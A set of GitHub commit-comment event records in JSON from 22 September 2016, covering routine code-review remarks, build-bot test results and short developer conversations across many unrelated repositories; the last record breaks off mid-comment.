{"id":"4604969206","type":"CommitCommentEvent","actor":{"login":"borisfom"},"repo":{"name":"torch/cutorch"},"payload":{"comment":{"id":19136635,"position":null,"line":null,"path":null,"commit_id":"25d9fddf8f9d4160a3b49c61b13b3dcb085a8969","created_at":"2016-09-22T20:42:38Z","updated_at":"2016-09-22T20:42:38Z","body":"Why is that? TX1 and Tegra are CUDA 7.0 and they have half instructions."}},"created_at":"2016-09-22T20:42:38Z"}
{"id":"4604978628","type":"CommitCommentEvent","actor":{"login":"nachofregeiro"},"repo":{"name":"driftyco/ionic-native"},"payload":{"comment":{"id":19136645,"position":null,"line":null,"path":null,"commit_id":"c33842f8f027d0ccd0259e807a3a6c64bc4b81f0","created_at":"2016-09-22T20:44:23Z","updated_at":"2016-09-22T20:44:23Z","body":"Ok, cool thank you."}},"created_at":"2016-09-22T20:44:23Z"}
{"id":"4604980792","type":"CommitCommentEvent","actor":{"login":"Zambom"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":19136649,"position":null,"line":null,"path":null,"commit_id":"fc0ed42281797e6854cb6999fa7d20d63d2cea32","created_at":"2016-09-22T20:44:48Z","updated_at":"2016-09-22T20:44:48Z","body":"It will use the 'name' field defined in the Activity model"}},"created_at":"2016-09-22T20:44:48Z"}
{"id":"4604980845","type":"CommitCommentEvent","actor":{"login":"Nick-Hall"},"repo":{"name":"gramps-project/gramps"},"payload":{"comment":{"id":19136650,"position":null,"line":null,"path":null,"commit_id":"c6fa40d389b19d2198acf37794d5cefc57ccd43b","created_at":"2016-09-22T20:44:49Z","updated_at":"2016-09-22T20:44:49Z","body":"Thanks.  Now a HandleError should only be thrown when there is a broken link in the database."}},"created_at":"2016-09-22T20:44:49Z"}
{"id":"4604985321","type":"CommitCommentEvent","actor":{"login":"slindberf"},"repo":{"name":"slindberf/codebros"},"payload":{"comment":{"id":19136661,"position":null,"line":null,"path":null,"commit_id":"03333d57feabaa0eeca2746f29c0c500663b22bb","created_at":"2016-09-22T20:45:38Z","updated_at":"2016-09-22T20:45:38Z","body":"<img width=\"78\" alt=\"screenshot 2016-09-22 22 43 54\" src=\"https://cloud.githubusercontent.com/assets/20428511/18765496/3f9e2442-8116-11e6-9c4d-29d6595fe8ea.png\">\r\n"}},"created_at":"2016-09-22T20:45:38Z"}
{"id":"4604987676","type":"CommitCommentEvent","actor":{"login":"amercer1"},"repo":{"name":"jetstream-cloud/atmosphere-ansible"},"payload":{"comment":{"id":19136665,"position":null,"line":null,"path":null,"commit_id":"72fc73d013d2fb0bc7ad141069e739d27542d887","created_at":"2016-09-22T20:46:06Z","updated_at":"2016-09-22T20:46:06Z","body":"Just a heads up @edwins. A few tasks and possibly another role rely on that script being there. I will make the necessary change to ensure this works."}},"created_at":"2016-09-22T20:46:06Z"}
{"id":"4604991867","type":"CommitCommentEvent","actor":{"login":"james-prior"},"repo":{"name":"cohpy/challenge-201608-refactor"},"payload":{"comment":{"id":19136672,"position":null,"line":null,"path":null,"commit_id":"8c242cf8dadeb494061419be1adf69d581b3db5f","created_at":"2016-09-22T20:46:53Z","updated_at":"2016-09-22T20:46:53Z","body":"bcostlow wrote:\n\n> The bit of code using eval is actually quite clever. An interesting problem\n> might be, how do you safely (but still simply) have the same functionality?\n\nI do not know of a simple way\nto make eval() and friends safe from injection attacks.\n"}},"created_at":"2016-09-22T20:46:53Z"}
{"id":"4605001295","type":"CommitCommentEvent","actor":{"login":"felixmc"},"repo":{"name":"felixmc/emojione-picker"},"payload":{"comment":{"id":19136704,"position":5,"line":23,"path":"lib/emoji.js","commit_id":"cbcb44cf1642f4cfd518f205899b67e4220d1f92","created_at":"2016-09-22T20:48:35Z","updated_at":"2016-09-22T20:48:35Z","body":"this looks like it should be a button, not a link?"}},"created_at":"2016-09-22T20:48:35Z"}
{"id":"4605007294","type":"CommitCommentEvent","actor":{"login":"pizzaisdavid"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19136716,"position":null,"line":null,"path":null,"commit_id":"0aba01fe5b91a921b788a8659b11ed2eb3b047cf","created_at":"2016-09-22T20:49:42Z","updated_at":"2016-09-22T20:49:42Z","body":"Hey dude, something came up, I'd be able to meet you at 3pm instead of 2pm. is that do-able?"}},"created_at":"2016-09-22T20:49:42Z"}
{"id":"4605007864","type":"CommitCommentEvent","actor":{"login":"creativeF1sh"},"repo":{"name":"uaandrei/d4232ffg"},"payload":{"comment":{"id":19136721,"position":null,"line":null,"path":null,"commit_id":"cf903a6392e1ff3b6172383decb1c6f80795edc3","created_at":"2016-09-22T20:49:48Z","updated_at":"2016-09-22T20:49:48Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;0ub82Gp5&#x2F;10-search-activities-for-users\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Search activities for users</a>"}},"created_at":"2016-09-22T20:49:48Z"}
{"id":"4605008787","type":"CommitCommentEvent","actor":{"login":"erkinalp"},"repo":{"name":"beretta42/FUZIX"},"payload":{"comment":{"id":19136724,"position":null,"line":null,"path":null,"commit_id":"c36ab792624030a24d13669f2870ee311636266d","created_at":"2016-09-22T20:50:00Z","updated_at":"2016-09-22T20:50:00Z","body":"Because GCC implements ISO C and integer minus ptr is undefined."}},"created_at":"2016-09-22T20:50:00Z"}
{"id":"4605010382","type":"CommitCommentEvent","actor":{"login":"creativeF1sh"},"repo":{"name":"uaandrei/d4232ffg"},"payload":{"comment":{"id":19136728,"position":null,"line":null,"path":null,"commit_id":"32580d267f62a258ad7d3c0e0b37effd1853266b","created_at":"2016-09-22T20:50:18Z","updated_at":"2016-09-22T20:50:18Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;0ub82Gp5&#x2F;10-search-activities-for-users\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Search activities for users</a>"}},"created_at":"2016-09-22T20:50:18Z"}
{"id":"4605011448","type":"CommitCommentEvent","actor":{"login":"felixmc"},"repo":{"name":"felixmc/emojione-picker"},"payload":{"comment":{"id":19136729,"position":null,"line":null,"path":null,"commit_id":"cbcb44cf1642f4cfd518f205899b67e4220d1f92","created_at":"2016-09-22T20:50:32Z","updated_at":"2016-09-22T20:50:32Z","body":"why remove all the role attributes?"}},"created_at":"2016-09-22T20:50:32Z"}
{"id":"4605012428","type":"CommitCommentEvent","actor":{"login":"gappleto97"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19136731,"position":null,"line":null,"path":null,"commit_id":"0aba01fe5b91a921b788a8659b11ed2eb3b047cf","created_at":"2016-09-22T20:50:47Z","updated_at":"2016-09-22T20:50:47Z","body":"Yeah, no problem. I'm going to the ACM meeting anyways, so I have to stay for that."}},"created_at":"2016-09-22T20:50:47Z"}
{"id":"4605017272","type":"CommitCommentEvent","actor":{"login":"artlogic"},"repo":{"name":"arsmentis/volt-theme"},"payload":{"comment":{"id":19136741,"position":null,"line":null,"path":null,"commit_id":"9a43d1f642ec995044fd18c135c6a27ae35d8412","created_at":"2016-09-22T20:51:38Z","updated_at":"2016-09-22T20:51:38Z","body":"This commit looks awfully big for the issue it closed."}},"created_at":"2016-09-22T20:51:38Z"}
{"id":"4605023517","type":"CommitCommentEvent","actor":{"login":"pizzaisdavid"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19136761,"position":null,"line":null,"path":null,"commit_id":"0aba01fe5b91a921b788a8659b11ed2eb3b047cf","created_at":"2016-09-22T20:52:49Z","updated_at":"2016-09-22T20:52:49Z","body":"oh whats ACM? I see its a programming contest, what will be done at the meeting?"}},"created_at":"2016-09-22T20:52:49Z"}
{"id":"4605029031","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19136776,"position":null,"line":null,"path":null,"commit_id":"a1722b22406de1fc587bc25e5940d4ac10f2089a","created_at":"2016-09-22T20:53:50Z","updated_at":"2016-09-22T20:53:50Z","body":"Sizing-Simple-Chilled-Ceiling (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1197 of 1197 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1722b22406de1fc587bc25e5940d4ac10f2089a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1722b22406de1fc587bc25e5940d4ac10f2089a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1722b22406de1fc587bc25e5940d4ac10f2089a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.13%25-green.svg)</a>\n"}},"created_at":"2016-09-22T20:53:50Z"}
{"id":"4605029171","type":"CommitCommentEvent","actor":{"login":"Tkkg1994"},"repo":{"name":"HydraCompany/HydraRom"},"payload":{"comment":{"id":19136777,"position":5,"line":175,"path":"system/build.prop","commit_id":"771c93c35bbdf324dddf0a3f96f905f079f031c4","created_at":"2016-09-22T20:53:52Z","updated_at":"2016-09-22T20:53:52Z","body":"it's ro.config.knox=v00"}},"created_at":"2016-09-22T20:53:52Z"}
{"id":"4605035301","type":"CommitCommentEvent","actor":{"login":"Gayos24"},"repo":{"name":"HydraCompany/HydraRom"},"payload":{"comment":{"id":19136784,"position":5,"line":175,"path":"system/build.prop","commit_id":"771c93c35bbdf324dddf0a3f96f905f079f031c4","created_at":"2016-09-22T20:55:01Z","updated_at":"2016-09-22T20:55:01Z","body":"no\r\n"}},"created_at":"2016-09-22T20:55:01Z"}
{"id":"4605035760","type":"CommitCommentEvent","actor":{"login":"hadek"},"repo":{"name":"hadek/test"},"payload":{"comment":{"id":19136788,"position":null,"line":null,"path":null,"commit_id":"95891480ccf0b01e164c14507d6c40b29eccce46","created_at":"2016-09-22T20:55:07Z","updated_at":"2016-09-22T20:55:07Z","body":"dsqsd"}},"created_at":"2016-09-22T20:55:07Z"}
{"id":"4605036854","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19136791,"position":null,"line":null,"path":null,"commit_id":"bfc48040efe7479a6aaf616faa59f4a0aa5e6370","created_at":"2016-09-22T20:55:19Z","updated_at":"2016-09-22T20:55:19Z","body":"EMS (brianlball) - i386-Windows-7-VisualStudio-12: OK (2322 of 2493 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-bfc48040efe7479a6aaf616faa59f4a0aa5e6370-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-bfc48040efe7479a6aaf616faa59f4a0aa5e6370-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.14%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T20:55:19Z"}
{"id":"4605039454","type":"CommitCommentEvent","actor":{"login":"SKBruck"},"repo":{"name":"arsmentis/volt-theme"},"payload":{"comment":{"id":19136799,"position":null,"line":null,"path":null,"commit_id":"9a43d1f642ec995044fd18c135c6a27ae35d8412","created_at":"2016-09-22T20:55:46Z","updated_at":"2016-09-22T20:55:46Z","body":"I redid the favicons to fix the ms-tile issue.\n\n- Sarah\n\nOn Thu, Sep 22, 2016 at 4:51 PM, James Kruth <notifications@github.com>\nwrote:\n\n> This commit looks awfully big for the issue it closed.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/arsmentis/volt-theme/commit/9a43d1f642ec995044fd18c135c6a27ae35d8412#commitcomment-19136741>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACX9s7c_SZcptivx_-zc5Ucb0cIUhA_Eks5qsupagaJpZM4KEWS7>\n> .\n>\n"}},"created_at":"2016-09-22T20:55:46Z"}
{"id":"4605041390","type":"CommitCommentEvent","actor":{"login":"elegos"},"repo":{"name":"Pherserk/symfony2_demo_article_feed"},"payload":{"comment":{"id":19136808,"position":5,"line":32,"path":"src/AppBundle/Controller/Api/ArticleController.php","commit_id":"26daeafbaa2a59789830db9f979e80ee00dc925a","created_at":"2016-09-22T20:56:08Z","updated_at":"2016-09-22T20:56:08Z","body":"This validation is useless now (see latest version), still in here. See other lines in the other actions, too."}},"created_at":"2016-09-22T20:56:08Z"}
{"id":"4605042111","type":"CommitCommentEvent","actor":{"login":"lieuwex"},"repo":{"name":"lesander/magister-calendar"},"payload":{"comment":{"id":19136809,"position":14,"line":77,"path":"magister-calendar.js","commit_id":"b0a5c7d464d69ce57efd02edd9086912eb37ba44","created_at":"2016-09-22T20:56:15Z","updated_at":"2016-09-22T20:56:15Z","body":"This should be `typeof CONFIG.debug == \"boolean\"`, currently the code just returns the type of `CONFIG.debug == \"boolean\"`, always resulting in 'boolean', which is implicitly converted to `true`. You can also just have `CONFIG.debug === true` in the `if` clause."}},"created_at":"2016-09-22T20:56:15Z"}
{"id":"4605042306","type":"CommitCommentEvent","actor":{"login":"atoshima"},"repo":{"name":"atoshima/reed-thesis"},"payload":{"comment":{"id":19136810,"position":5,"line":24,"path":"README.md","commit_id":"96d6237d8f9f2118e74feb7274c57f2feb3d9cbe","created_at":"2016-09-22T20:56:16Z","updated_at":"2016-09-22T20:56:16Z","body":"nice job!"}},"created_at":"2016-09-22T20:56:16Z"}
{"id":"4605042330","type":"CommitCommentEvent","actor":{"login":"lieuwex"},"repo":{"name":"lesander/magister-calendar"},"payload":{"comment":{"id":19136811,"position":31,"line":447,"path":"magister-calendar.js","commit_id":"b0a5c7d464d69ce57efd02edd9086912eb37ba44","created_at":"2016-09-22T20:56:17Z","updated_at":"2016-09-22T20:56:17Z","body":"Is `cache.status !== appointment.status` not an option here?"}},"created_at":"2016-09-22T20:56:17Z"}
{"id":"4605042478","type":"CommitCommentEvent","actor":{"login":"lieuwex"},"repo":{"name":"lesander/magister-calendar"},"payload":{"comment":{"id":19136813,"position":40,"line":516,"path":"magister-calendar.js","commit_id":"b0a5c7d464d69ce57efd02edd9086912eb37ba44","created_at":"2016-09-22T20:56:18Z","updated_at":"2016-09-22T20:56:18Z","body":"Can't `appointment#scrapped` be used here?"}},"created_at":"2016-09-22T20:56:18Z"}
{"id":"4605044281","type":"CommitCommentEvent","actor":{"login":"guilhermejcgois"},"repo":{"name":"Richsan/Krakacomp"},"payload":{"comment":{"id":19136815,"position":null,"line":null,"path":null,"commit_id":"ccfe76d347563b4a6991b7de192730e1d8279c07","created_at":"2016-09-22T20:56:36Z","updated_at":"2016-09-22T20:56:36Z","body":"Acho que o problema com o OK-SIN16 deve ser o ++i (ou o ++j), acredito que ele seja um Statement, mas não consegui pensar em onde fazer a verificação dele, se quando chega lá em statement() adicionamos um case pra '+' e '-' e daí verificamos se ele repete e depois tem um identificador.\r\n\r\nNo report tem vários arquivos com erros com mensagens diferentes da esperada, não foquei em trabalhar isso (mesmo que seja simples) porque tenho outras coisas que preciso ver. Se eu conseguir terminar ou andar bem com essas outras coisas (inclui-se aqui TALP), eu arrumo eles.\r\n\r\nAcho que até nesse fds conseguimos fechar o analisador sintático..."}},"created_at":"2016-09-22T20:56:36Z"}
{"id":"4605048780","type":"CommitCommentEvent","actor":{"login":"ykazakov"},"repo":{"name":"protegeproject/protege"},"payload":{"comment":{"id":19136820,"position":null,"line":null,"path":null,"commit_id":"c25c20d3209b0b0d11984942274026f3d0db2349","created_at":"2016-09-22T20:57:24Z","updated_at":"2016-09-22T20:57:24Z","body":"I have a problem in Eclipse due to javax.annotation.* added the export declarations of protege-common Manifest.MF: protege-common does not contain this package and does not embed the dependency jsr305 which has this packages. Also, jsr305 jar is not included in the bundles. What is the purpose of this change? Should jsr305 be rather embedded & exported in protege-editor-core like mdock and jgoodies-*? "}},"created_at":"2016-09-22T20:57:24Z"}
{"id":"4605050240","type":"CommitCommentEvent","actor":{"login":"revolter"},"repo":{"name":"revolter/sqlitebrowser"},"payload":{"comment":{"id":19136823,"position":null,"line":null,"path":null,"commit_id":"72439f0b0c128cb76f5e1916a4cfdd2d462c72a2","created_at":"2016-09-22T20:57:41Z","updated_at":"2016-09-22T20:57:41Z","body":"It was so easy :| Thanks! Please merge it if it looks good."}},"created_at":"2016-09-22T20:57:41Z"}
{"id":"4605053917","type":"CommitCommentEvent","actor":{"login":"cing"},"repo":{"name":"msmbuilder/mdentropy"},"payload":{"comment":{"id":19136828,"position":null,"line":null,"path":null,"commit_id":"63441b15cf91839f7493bd77d824bf1337a4ff1e","created_at":"2016-09-22T20:58:21Z","updated_at":"2016-09-22T20:58:21Z","body":"Noticed the default CLI number of bins went from 30 to 3. Any comment on that? I've been using an mdentropy 0.2 and when I compare to this new version I need to use a small number of bins (like 3-4) or I only get non-zero values on the diagonal. "}},"created_at":"2016-09-22T20:58:21Z"}
{"id":"4605057093","type":"CommitCommentEvent","actor":{"login":"katejeffreys"},"repo":{"name":"katejeffreys/hello-world"},"payload":{"comment":{"id":19136831,"position":null,"line":null,"path":null,"commit_id":"a9fdd57811f18ab4a832c15153e7cfbef530e9d1","created_at":"2016-09-22T20:58:54Z","updated_at":"2016-09-22T20:58:54Z","body":"Meaningless change is meaningless. Please proceed."}},"created_at":"2016-09-22T20:58:54Z"}
{"id":"4605061551","type":"CommitCommentEvent","actor":{"login":"18515301400"},"repo":{"name":"18515301400/N-blog"},"payload":{"comment":{"id":19136835,"position":null,"line":null,"path":null,"commit_id":"4b257235698072c4dd46a9be4dad7e609ef5778f","created_at":"2016-09-22T20:59:44Z","updated_at":"2016-09-22T20:59:44Z","body":"111"}},"created_at":"2016-09-22T20:59:44Z"}
{"id":"4605062600","type":"CommitCommentEvent","actor":{"login":"mchav"},"repo":{"name":"hyperreality/Poetry-Tools"},"payload":{"comment":{"id":19136839,"position":null,"line":null,"path":null,"commit_id":"83bf5d5941219e8947b4f8ca0b557614b23d9b60","created_at":"2016-09-22T20:59:56Z","updated_at":"2016-09-22T20:59:56Z","body":"Great application. I was looking to do something similar in Scala would you mind if I borrowed some concepts?"}},"created_at":"2016-09-22T20:59:56Z"}
{"id":"4605064678","type":"CommitCommentEvent","actor":{"login":"No1KnowMe"},"repo":{"name":"xfunforx/XglyphController"},"payload":{"comment":{"id":19136845,"position":null,"line":null,"path":null,"commit_id":"ba4cccfe0c4a46764323bee889a8f970885ab184","created_at":"2016-09-22T21:00:17Z","updated_at":"2016-09-22T21:00:17Z","body":"Man , thanks for this Tweak , but i don't know how to use it , i download and compile XGlyphiOS e XglyphController , but how can i use it ? Little Wiki please 😅😊😉"}},"created_at":"2016-09-22T21:00:17Z"}
{"id":"4605066038","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/chromium"},"payload":{"comment":{"id":19136848,"position":5,"line":12,"path":"components/search_engines/prepopulated_engines.json","commit_id":"440e1926c6c0c56a3c993cdf2aad06a551bd80df","created_at":"2016-09-22T21:00:30Z","updated_at":"2016-09-22T21:00:30Z","body":"what the ..."}},"created_at":"2016-09-22T21:00:30Z"}
{"id":"4605066724","type":"CommitCommentEvent","actor":{"login":"jhallard"},"repo":{"name":"CamioCam/rtsp"},"payload":{"comment":{"id":19136850,"position":5,"line":24,"path":"cameras/paths.csv","commit_id":"3f099b7b2a99a46ba2673f21f6aad35e8fea9b28","created_at":"2016-09-22T21:00:39Z","updated_at":"2016-09-22T21:00:39Z","body":"@jcmaslan can you confirm this looks right?"}},"created_at":"2016-09-22T21:00:39Z"}
{"id":"4605067510","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/chromium"},"payload":{"comment":{"id":19136853,"position":null,"line":null,"path":null,"commit_id":"440e1926c6c0c56a3c993cdf2aad06a551bd80df","created_at":"2016-09-22T21:00:49Z","updated_at":"2016-09-22T21:00:49Z","body":"++"}},"created_at":"2016-09-22T21:00:49Z"}
{"id":"4605068304","type":"CommitCommentEvent","actor":{"login":"bitsteller"},"repo":{"name":"bitsteller/gtfsdb"},"payload":{"comment":{"id":19136857,"position":null,"line":null,"path":null,"commit_id":"2054c2b9527b99405c21c59cc77f03fa16ea6b56","created_at":"2016-09-22T21:00:56Z","updated_at":"2016-09-22T21:00:56Z","body":"fixes path after unpacking (at least on macOS)"}},"created_at":"2016-09-22T21:00:56Z"}
{"id":"4605068373","type":"CommitCommentEvent","actor":{"login":"matthewhorridge"},"repo":{"name":"protegeproject/protege"},"payload":{"comment":{"id":19136858,"position":null,"line":null,"path":null,"commit_id":"c25c20d3209b0b0d11984942274026f3d0db2349","created_at":"2016-09-22T21:00:57Z","updated_at":"2016-09-22T21:00:57Z","body":"> Should jsr305 be rather embedded & exported in protege-editor-core like mdock and jgoodies-*?\r\n\b\r\nYes, I think it should be.  It is actually provided at runtime, but this probably needs double checking as things are probably a bit fragile as they are."}},"created_at":"2016-09-22T21:00:57Z"}
{"id":"4605068801","type":"CommitCommentEvent","actor":{"login":"alacambra"},"repo":{"name":"hwuerz/jpa-example"},"payload":{"comment":{"id":19136859,"position":14,"line":14,"path":"src/main/java/de/hwuerz/example/hibernate/Controller.java","commit_id":"adbbef29151fa4399feebf491949cc70bbe245e8","created_at":"2016-09-22T21:01:00Z","updated_at":"2016-09-22T21:01:00Z","body":"Meinst du professionell? Ich arbeite jetzt als consultnat, java\nspezieliziert. Am Montag kriege ich ein Projekt in commerzbank. Ich glaube\naber mit vert.x :-) wenn du Fragen hast mit deine Datenbank sagt bescheid\n;-)\n\nEl dia 22 set. 2016 21.33, \"Hendrik Würz\" <notifications@github.com> va\nescriure:\n\n> Ich bin im Moment dabei meine private Filmdatenbank neu zu schreiben.\n> Allerdings weiß ich noch nicht, ob die jemals richtig fertig wird, da ich\n> ständig alles wieder umbaue. Das ist also ehr ein Spiel-Projekt, aber dafür\n> in Java. Hast du etwas gefunden, bei dem du weiterhin Java entwickeln\n> kannst?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/hwuerz/jpa-example/commit/adbbef29151fa4399feebf491949cc70bbe245e8#commitcomment-19135846>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEzS9C581DOm3szuquc3tmy6bgXp14moks5qstf5gaJpZM4KC0hC>\n> .\n>\n"}},"created_at":"2016-09-22T21:01:00Z"}
{"id":"4605070392","type":"CommitCommentEvent","actor":{"login":"lesander"},"repo":{"name":"lesander/magister-calendar"},"payload":{"comment":{"id":19136861,"position":14,"line":77,"path":"magister-calendar.js","commit_id":"b0a5c7d464d69ce57efd02edd9086912eb37ba44","created_at":"2016-09-22T21:01:18Z","updated_at":"2016-09-22T21:01:18Z","body":"Oops. Typo-ish. I shouldn't be coding when the level of caffeine in my body is low. 😅"}},"created_at":"2016-09-22T21:01:18Z"}
{"id":"4605077477","type":"CommitCommentEvent","actor":{"login":"bubbaayala"},"repo":{"name":"OSU-CS290-F16/assignment-0-bubbaayala"},"payload":{"comment":{"id":19136877,"position":1,"line":1,"path":"index.html","commit_id":"fe7f6d43bf6775e9549b0717564fe8bfc2181bcc","created_at":"2016-09-22T21:02:34Z","updated_at":"2016-09-22T21:02:34Z","body":"name and nickname\r\n"}},"created_at":"2016-09-22T21:02:34Z"}
{"id":"4605078045","type":"CommitCommentEvent","actor":{"login":"ykazakov"},"repo":{"name":"protegeproject/protege"},"payload":{"comment":{"id":19136881,"position":null,"line":null,"path":null,"commit_id":"c25c20d3209b0b0d11984942274026f3d0db2349","created_at":"2016-09-22T21:02:41Z","updated_at":"2016-09-22T21:02:41Z","body":"Actually jsr305 jar is a bundle, so it can be just copied to bundles/ and no additional export declarations are needed. What is it for?"}},"created_at":"2016-09-22T21:02:41Z"}
{"id":"4605078272","type":"CommitCommentEvent","actor":{"login":"greenlaw110"},"repo":{"name":"rythmengine/rythmengine"},"payload":{"comment":{"id":19136884,"position":null,"line":null,"path":null,"commit_id":"e088577eb5a25ca06c9c4d9b55f90411af1fed87","created_at":"2016-09-22T21:02:44Z","updated_at":"2016-09-22T21:02:44Z","body":"Well I think the breaking of compatibility needs to be planned, instead of happening in a adhoc manner. Let's say we want to declare that Rythm will drop the support for Java 1.6 on v1.7 for example, then we can create an issue to mark the change request, and allocate the issue to v1.7 milestone. I don't want to receive a support request asking from user asking why the library failed work without any notice"}},"created_at":"2016-09-22T21:02:44Z"}
{"id":"4605078565","type":"CommitCommentEvent","actor":{"login":"ArnaudBienner"},"repo":{"name":"clementine-player/Dependencies"},"payload":{"comment":{"id":19136886,"position":null,"line":null,"path":null,"commit_id":"93c3977d9f2f5e24347989ecb9660812490aa7c2","created_at":"2016-09-22T21:02:47Z","updated_at":"2016-09-22T21:02:47Z","body":"Build currently broken at the download step (easy to reproduce locally).\r\nSome downloads randomly fail and return the following HTML page:\r\n\r\n\"502. That’s an error.\r\n\r\nThe server encountered a temporary error and could not complete your request.\r\n\r\nPlease try again in 30 seconds. That’s all we know.\"\r\n\r\nI'm not sure if Google put a limitation on the number of download allowed for a given time, or if it is just temporary broken.\r\nI will try again later. If the problem persists, I will try to implement a workaround to try again when we have this error."}},"created_at":"2016-09-22T21:02:47Z"}
{"id":"4605081127","type":"CommitCommentEvent","actor":{"login":"lesander"},"repo":{"name":"lesander/magister-calendar"},"payload":{"comment":{"id":19136893,"position":31,"line":447,"path":"magister-calendar.js","commit_id":"b0a5c7d464d69ce57efd02edd9086912eb37ba44","created_at":"2016-09-22T21:03:15Z","updated_at":"2016-09-22T21:03:15Z","body":"Yup, it is. "}},"created_at":"2016-09-22T21:03:15Z"}
{"id":"4605082257","type":"CommitCommentEvent","actor":{"login":"matthewhorridge"},"repo":{"name":"protegeproject/protege"},"payload":{"comment":{"id":19136897,"position":null,"line":null,"path":null,"commit_id":"c25c20d3209b0b0d11984942274026f3d0db2349","created_at":"2016-09-22T21:03:27Z","updated_at":"2016-09-22T21:03:27Z","body":"> What is it for?\r\n\r\nAssigning nullable and non null annotation to parameters and return values"}},"created_at":"2016-09-22T21:03:27Z"}
{"id":"4605082384","type":"CommitCommentEvent","actor":{"login":"ykazakov"},"repo":{"name":"protegeproject/protege"},"payload":{"comment":{"id":19136898,"position":null,"line":null,"path":null,"commit_id":"c25c20d3209b0b0d11984942274026f3d0db2349","created_at":"2016-09-22T21:03:28Z","updated_at":"2016-09-22T21:03:28Z","body":"How is it provided at runtime? I cannot see jsr305 in bundles."}},"created_at":"2016-09-22T21:03:28Z"}
{"id":"4605085788","type":"CommitCommentEvent","actor":{"login":"aembler"},"repo":{"name":"concrete5/concrete5"},"payload":{"comment":{"id":19136906,"position":4,"line":14,"path":"concrete/src/Page/Stack/Stack.php","commit_id":"3c038d80d62e32078905b9e904494d748cd66d71","created_at":"2016-09-22T21:04:03Z","updated_at":"2016-09-22T21:04:03Z","body":"Fixed\r\n"}},"created_at":"2016-09-22T21:04:03Z"}
{"id":"4605086332","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":19136908,"position":null,"line":null,"path":null,"commit_id":"e53b2731c4b8b236b15cd51d2c8ed84b1f25bbce","created_at":"2016-09-22T21:04:08Z","updated_at":"2016-09-22T21:04:08Z","body":"Nice :-) \r\n\r\nEven protecting any of our pieces could be worthwhile."}},"created_at":"2016-09-22T21:04:08Z"}
{"id":"4605088658","type":"CommitCommentEvent","actor":{"login":"jcmaslan"},"repo":{"name":"CamioCam/rtsp"},"payload":{"comment":{"id":19136910,"position":5,"line":24,"path":"cameras/paths.csv","commit_id":"3f099b7b2a99a46ba2673f21f6aad35e8fea9b28","created_at":"2016-09-22T21:04:29Z","updated_at":"2016-09-22T21:04:29Z","body":"1) enumerate 8 channels 01;02;03;...\r\n2) make type nvr (not camera)"}},"created_at":"2016-09-22T21:04:29Z"}
{"id":"4605093099","type":"CommitCommentEvent","actor":{"login":"hobson"},"repo":{"name":"totalgood/keras"},"payload":{"comment":{"id":19136922,"position":56,"line":218,"path":"keras/layers/advanced_activations.py","commit_id":"232f77003f0357d3de31a0db0b1ac9c532dfb3ce","created_at":"2016-09-22T21:05:17Z","updated_at":"2016-09-22T21:05:17Z","body":"Nice! Thank you.\n\n--Hobson\n(503) 974-6274\ngh <https://github.com/hobson/> twtr <https://twitter.com/hobsonlane> li\n<https://www.linkedin.com/in/hobsonlane> g+\n<http://plus.google.com/+HobsonLane/> so\n<http://stackoverflow.com/users/623735/hobs>\n\nOn Thu, Sep 22, 2016 at 1:09 PM, Taras Boiko <notifications@github.com>\nwrote:\n\n> Looks like you need to add K.select to keras which wraps tf.select /\n> K.switch\n>\n> also\n> 1. Use K.lesser, K.greater\n> 2. tensors are lazy so dont be afraid to use extra variables\n>\n> def call(self, x, mask=None):\n>   pos = self.call_alpha_gt(x, self.alphas)\n>   neg = self.call_alpha_lt(x, self.alphas)\n>\n>   is_pos = K.greater(self.alphas, 0)\n>   is_neg = K.lesser(self.alphas, 0)\n>\n>   return K.select(is_pos, pos,\n>                   K.select(is_neg, neg, x))\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> 